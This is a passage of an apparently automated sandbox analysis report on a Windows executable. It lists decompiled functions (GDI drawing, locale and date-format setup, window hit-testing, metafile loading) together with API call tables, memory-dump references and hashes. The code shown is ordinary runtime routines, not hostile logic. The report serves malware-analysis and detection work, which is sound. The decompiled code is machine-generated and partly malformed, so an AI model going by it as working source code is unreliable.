                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043533D
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 00435353
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 0043538B
                                                                                • MulDiv.KERNEL32(?,?,?), ref: 004353A3
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 004353ED
                                                                                • MulDiv.KERNEL32(?,?,0000001F), ref: 00435416
                                                                                • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043543C
                                                                                  • Part of subcall function 0041EDEC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041EDF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction ID: 8953bc8b0a4d67b9433345c2c8a17991cd0cb88a4a3005cd9b45d3bc99294169
                                                                                • Opcode Fuzzy Hash: 435e03ab1caa1e1677467894ed5e915b6374115a8e24f0854a88f83eb046f16a
                                                                                • Instruction Fuzzy Hash: 405160B0208B40AFD720DF69C845B6BB7E9AF49344F08582EBDD6C7752C679E840CB19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00436150, Relevance: 13.6, APIs: 9, Instructions: 122windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00436150(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406E28();
				_v16 = _t33;
				_push(_t92);
				_push(0x43626b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041F36C( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x436272);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407080();
				return _t72;
			}





















                                                                                0x00436151
                                                                                0x00436153
                                                                                0x00436159
                                                                                0x00436165
                                                                                0x0043616b
                                                                                0x0043617b
                                                                                0x00436182
                                                                                0x00436183
                                                                                0x00436184
                                                                                0x00436185
                                                                                0x00436186
                                                                                0x0043616d
                                                                                0x0043616d
                                                                                0x00436174
                                                                                0x00436175
                                                                                0x00436176
                                                                                0x00436177
                                                                                0x00436178
                                                                                0x00436178
                                                                                0x0043618c
                                                                                0x0043618f
                                                                                0x00436194
                                                                                0x00436196
                                                                                0x00436199
                                                                                0x0043619a
                                                                                0x0043619f
                                                                                0x004361a4
                                                                                0x004361a5
                                                                                0x004361aa
                                                                                0x004361ad
                                                                                0x004361c2
                                                                                0x004361ce
                                                                                0x004361d6
                                                                                0x004361e3
                                                                                0x00436205
                                                                                0x00436224
                                                                                0x0043623e
                                                                                0x0043624b
                                                                                0x00436252
                                                                                0x00436255
                                                                                0x00436258
                                                                                0x00436260
                                                                                0x00436261
                                                                                0x00436264
                                                                                0x00436265
                                                                                0x0043626a

                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00436187
                                                                                • 72E7ACE0.USER32(?,00000000,00000402), ref: 0043619A
                                                                                • SelectObject.GDI32(?,00000000), ref: 004361BD
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004361E3
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00436205
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436224
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043623E
                                                                                • SelectObject.GDI32(?,?), ref: 0043624B
                                                                                • 72E7B380.USER32(?,?,00436272,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00436265
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ObjectSelect$B380DesktopWindow
                                                                                • String ID:
                                                                                • API String ID: 989747725-0
                                                                                • Opcode ID: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction ID: 84461609b0ce5577f178a86038dc7842a2152db3a2ecfe340c7df496a6863dc3
                                                                                • Opcode Fuzzy Hash: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction Fuzzy Hash: 4F313DB6A00219BFDB00DEEDCC85EAFBBBCAF09354B414565F504F7241C679AD048BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AEE4, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0040AEE4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b1af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040AD70();
				E004099B8(__ebx, __edi, __esi);
				_t196 =  *0x4877fc;
				if( *0x4877fc != 0) {
					E00409B90(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409908(_t43, 0, 0x14,  &_v20);
				E00404374(0x487730, _v20);
				E00409908(_t43, 0x40b1c4, 0x1b,  &_v24);
				 *0x487734 = E00408708(0x40b1c4, 0, _t196);
				E00409908(_t132, 0x40b1c4, 0x1c,  &_v28);
				 *0x487735 = E00408708(0x40b1c4, 0, _t196);
				 *0x487736 = E00409954(_t132, 0x2c, 0xf);
				 *0x487737 = E00409954(_t132, 0x2e, 0xe);
				E00409908(_t132, 0x40b1c4, 0x19,  &_v32);
				 *0x487738 = E00408708(0x40b1c4, 0, _t196);
				 *0x487739 = E00409954(_t132, 0x2f, 0x1d);
				E00409908(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409C40(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404374(0x48773c, _v36);
				E00409908(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409C40(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404374(0x487740, _v44);
				 *0x487744 = E00409954(_t132, 0x3a, 0x1e);
				E00409908(_t132, 0x40b1f8, 0x28,  &_v52);
				E00404374(0x487748, _v52);
				E00409908(_t132, 0x40b204, 0x29,  &_v56);
				E00404374(0x48774c, _v56);
				E00404320( &_v12);
				E00404320( &_v16);
				E00409908(_t132, 0x40b1c4, 0x25,  &_v60);
				_t104 = E00408708(0x40b1c4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043B8( &_v8, 0x40b21c);
				} else {
					E004043B8( &_v8, 0x40b210);
				}
				E00409908(_t132, 0x40b1c4, 0x23,  &_v64);
				_t111 = E00408708(0x40b1c4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409908(_t132, 0x40b1c4, 0x1005,  &_v68);
					if(E00408708(0x40b1c4, 0, _t198) != 0) {
						E004043B8( &_v12, 0x40b238);
					} else {
						E004043B8( &_v16, 0x40b228);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404698();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404698();
				 *0x4877fe = E00409954(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B1B6);
				return E00404344( &_v68, 0x10);
			}

























                                                                                0x0040aee4
                                                                                0x0040aee4
                                                                                0x0040aee5
                                                                                0x0040aee7
                                                                                0x0040aeec
                                                                                0x0040aeec
                                                                                0x0040aeee
                                                                                0x0040aef0
                                                                                0x0040aef0
                                                                                0x0040aef3
                                                                                0x0040aef6
                                                                                0x0040aef7
                                                                                0x0040aefc
                                                                                0x0040aeff
                                                                                0x0040af02
                                                                                0x0040af07
                                                                                0x0040af0c
                                                                                0x0040af13
                                                                                0x0040af15
                                                                                0x0040af15
                                                                                0x0040af1f
                                                                                0x0040af2e
                                                                                0x0040af3b
                                                                                0x0040af50
                                                                                0x0040af5f
                                                                                0x0040af74
                                                                                0x0040af83
                                                                                0x0040af96
                                                                                0x0040afa9
                                                                                0x0040afbe
                                                                                0x0040afcd
                                                                                0x0040afe0
                                                                                0x0040aff5
                                                                                0x0040b000
                                                                                0x0040b00d
                                                                                0x0040b022
                                                                                0x0040b02d
                                                                                0x0040b03a
                                                                                0x0040b04d
                                                                                0x0040b062
                                                                                0x0040b06f
                                                                                0x0040b084
                                                                                0x0040b091
                                                                                0x0040b099
                                                                                0x0040b0a1
                                                                                0x0040b0b6
                                                                                0x0040b0c0
                                                                                0x0040b0c5
                                                                                0x0040b0c7
                                                                                0x0040b0e0
                                                                                0x0040b0c9
                                                                                0x0040b0d1
                                                                                0x0040b0d1
                                                                                0x0040b0f5
                                                                                0x0040b0ff
                                                                                0x0040b104
                                                                                0x0040b106
                                                                                0x0040b118
                                                                                0x0040b129
                                                                                0x0040b142
                                                                                0x0040b12b
                                                                                0x0040b133
                                                                                0x0040b133
                                                                                0x0040b129
                                                                                0x0040b147
                                                                                0x0040b14a
                                                                                0x0040b14d
                                                                                0x0040b152
                                                                                0x0040b15f
                                                                                0x0040b164
                                                                                0x0040b167
                                                                                0x0040b16a
                                                                                0x0040b16f
                                                                                0x0040b17c
                                                                                0x0040b18f
                                                                                0x0040b196
                                                                                0x0040b199
                                                                                0x0040b19c
                                                                                0x0040b1ae

                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,0040B1AF,?,?,00000000,00000000), ref: 0040AF1A
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 4232894706-2493093252
                                                                                • Opcode ID: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction ID: dd7168d140dabf44b549f8ddecd6ea9c3e8e9b3ee97471e2bc34665e137c0820
                                                                                • Opcode Fuzzy Hash: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction Fuzzy Hash: AA613B707042489BDB00FBA6CCA1A9E76A6DB89304F60943EE550BB3C6CB3CDD05875D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043302C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0043302C(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x43334d
				_t113 = E00433464( *_t2 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x486c60; // 0x487bfc
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043BD14(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x43334d
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x43334d
						_t106 =  *0x4317f8; // 0x431844
						__eflags = E00403740( *((intOrPtr*)( *_t18 - 0x10)), _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x43334d
							_v32 = E0043BD14( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00432FC0);
						_push(GetCurrentThreadId());
						L00406DA8();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037B0(_t101, _t126);
						_t78 =  *0x487b84; // 0x0
						_t110 =  *0x4305d4; // 0x430620
						if(E00403740(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x487b84; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x487b84; // 0x0
						if(E0043BD14( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043BD14(_t116);
					goto L19;
				}
				_t117 = E004325B4(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043BD14(_t117);
					goto L6;
				}
			}































                                                                                0x0043302c
                                                                                0x00433035
                                                                                0x00433037
                                                                                0x0043303b
                                                                                0x00433046
                                                                                0x00433048
                                                                                0x0043304e
                                                                                0x00433053
                                                                                0x0043305e
                                                                                0x00433087
                                                                                0x0043308b
                                                                                0x004331ba
                                                                                0x004331c3
                                                                                0x004331c3
                                                                                0x00433091
                                                                                0x00433097
                                                                                0x00433097
                                                                                0x0043309c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433095
                                                                                0x00433095
                                                                                0x004330a5
                                                                                0x004330a7
                                                                                0x004330ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004330b3
                                                                                0x004330b9
                                                                                0x004330be
                                                                                0x004330dc
                                                                                0x004330e2
                                                                                0x004330ed
                                                                                0x004330ef
                                                                                0x00433101
                                                                                0x00433103
                                                                                0x004330f1
                                                                                0x004330f1
                                                                                0x004330fc
                                                                                0x004330fc
                                                                                0x00433106
                                                                                0x00433106
                                                                                0x0043310a
                                                                                0x00433110
                                                                                0x00433116
                                                                                0x0043311c
                                                                                0x0043311d
                                                                                0x00433127
                                                                                0x00433128
                                                                                0x0043312d
                                                                                0x00433131
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043313f
                                                                                0x0043314a
                                                                                0x0043314f
                                                                                0x0043315f
                                                                                0x00433164
                                                                                0x00433169
                                                                                0x00433176
                                                                                0x004331a1
                                                                                0x004331b4
                                                                                0x004331b6
                                                                                0x004331b6
                                                                                0x00000000
                                                                                0x004331b4
                                                                                0x00433178
                                                                                0x00433187
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433189
                                                                                0x0043319f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043319f
                                                                                0x004330c3
                                                                                0x004330c9
                                                                                0x004330c9
                                                                                0x004330ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004330c7
                                                                                0x004330c7
                                                                                0x004330d7
                                                                                0x00000000
                                                                                0x004330d7
                                                                                0x00433068
                                                                                0x0043306c
                                                                                0x00000000
                                                                                0x00433072
                                                                                0x00433076
                                                                                0x00433076
                                                                                0x0043307b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433074
                                                                                0x00433074
                                                                                0x00433084
                                                                                0x00000000
                                                                                0x00433084

                                                                                APIs
                                                                                  • Part of subcall function 00433464: WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 00433464: GetParent.USER32(00000000), ref: 00433481
                                                                                • GetWindow.USER32(00000000,00000004), ref: 0043304E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00433122
                                                                                • 72E7AC10.USER32(00000000,00432FC0,?,00000000,00000004,?,-0000000C,?), ref: 00433128
                                                                                • GetWindowRect.USER32 ref: 0043313F
                                                                                • IntersectRect.USER32 ref: 004331AD
                                                                                  • Part of subcall function 004325B4: GlobalFindAtomA.KERNEL32 ref: 004325C8
                                                                                  • Part of subcall function 004325B4: GetPropA.USER32 ref: 004325DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Rect$AtomCurrentFindFromGlobalIntersectParentPointPropThread
                                                                                • String ID: M3C$M3C
                                                                                • API String ID: 2329882401-1772212157
                                                                                • Opcode ID: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction ID: a128a9aac8d38b63d4cbe000c1c78fed1b90614d1cbd1cfb40740373f1eb891c
                                                                                • Opcode Fuzzy Hash: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction Fuzzy Hash: A4516071A002059FCB50DF69C884BAEBBF4AF08355F1491A6F914EB351D738EE41CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00455740, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 00455753
                                                                                • GetWindowRect.USER32 ref: 004557AD
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004557E5
                                                                                • MessageBoxA.USER32 ref: 00455826
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045589C,?,00000000,00455895), ref: 00455876
                                                                                • SetActiveWindow.USER32(?,0045589C,?,00000000,00455895), ref: 00455887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Active$MessageRect
                                                                                • String ID: (
                                                                                • API String ID: 3147912190-3887548279
                                                                                • Opcode ID: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction ID: 27f95780b0de453b95edefb76a011dd12389370940b1ed7da23c547e447e93a7
                                                                                • Opcode Fuzzy Hash: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction Fuzzy Hash: FE413C75E00208AFDB44DBA9CD95FBE77F9EB48304F14446AF900EB392D678AE048B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042237E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E0042237E(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				int _v12;
				BYTE* _v16;
				intOrPtr _v18;
				signed int _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				char _v38;
				struct tagMETAFILEPICT _v54;
				intOrPtr _v118;
				intOrPtr _v122;
				struct tagENHMETAHEADER _v154;
				intOrPtr _t103;
				intOrPtr _t115;
				struct HENHMETAFILE__* _t119;
				struct HENHMETAFILE__* _t120;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				intOrPtr _t126;

				_t124 = _t125;
				_t126 = _t125 + 0xffffff68;
				_v12 = __ecx;
				_v8 = __edx;
				_t122 = __eax;
				E0042221C(__eax);
				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
					E004200B4();
				}
				_v12 = _v12 - 0x16;
				_v16 = E0040272C(_v12);
				_t103 =  *((intOrPtr*)(_t122 + 0x28));
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
				if(_v24 == 0) {
					_v24 = 0x60;
				}
				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E004200B4();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E004200B4();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E004224F6);
				return E0040274C(_v16);
			}


























                                                                                0x00422381
                                                                                0x00422383
                                                                                0x0042238c
                                                                                0x0042238f
                                                                                0x00422392
                                                                                0x00422396
                                                                                0x004223a8
                                                                                0x004223b2
                                                                                0x004223c2
                                                                                0x004223c2
                                                                                0x004223c7
                                                                                0x004223d3
                                                                                0x004223d6
                                                                                0x004223e4
                                                                                0x004223f2
                                                                                0x004223fc
                                                                                0x00422405
                                                                                0x00422407
                                                                                0x00422407
                                                                                0x00422427
                                                                                0x00422444
                                                                                0x00422447
                                                                                0x00422450
                                                                                0x00422455
                                                                                0x0042245a
                                                                                0x00422470
                                                                                0x00422472
                                                                                0x00422477
                                                                                0x00422479
                                                                                0x00422479
                                                                                0x0042248b
                                                                                0x00422490
                                                                                0x0042249a
                                                                                0x004224a0
                                                                                0x004224a5
                                                                                0x004224ac
                                                                                0x004224c4
                                                                                0x004224c6
                                                                                0x004224cb
                                                                                0x004224cd
                                                                                0x004224cd
                                                                                0x004224d2
                                                                                0x004224d8
                                                                                0x004224db
                                                                                0x004224de
                                                                                0x004224ee

                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
